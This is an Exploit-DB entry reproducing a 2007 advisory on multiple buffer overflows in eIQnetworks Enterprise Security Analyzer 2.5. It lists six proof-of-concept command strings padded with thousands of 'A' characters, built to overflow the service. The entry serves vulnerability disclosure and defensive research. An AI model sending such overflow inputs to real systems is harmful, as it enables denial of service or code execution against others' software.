eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities

EDB-ID:

29850


Type:

dos


Platform:

Windows

Date:

2007-04-12


source: https://www.securityfocus.com/bid/23454/info

eIQnetworks Enterprise Security Analyzer is prone to multiple buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

Exploiting these issues allows remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

Enterprise Security Analyzer 2.5 is reported vulnerable; other versions may also be affected. 

- DELETESEARCHFOLDER : [DELETESEARCHFOLDER&A x 40000...&]
- DELTASK: [DELTASK&A x 3000...&current&test&]
- HMGR_CHECKHOSTSCSV: [ HMGR_CHECKHOSTSCSV&A x 80000...&]
- TASKUPDATEDUSER: [TASKUPDATEDUSER&A x 60000...&test&test&]
- VERIFYUSERKEY: [VERIFYUSERKEY&A x 13000...&Administrator&127.0.0.1&12345]
- VERIFYPWD: [VERIFYPWD&A x 6000...&admin&adminpass&]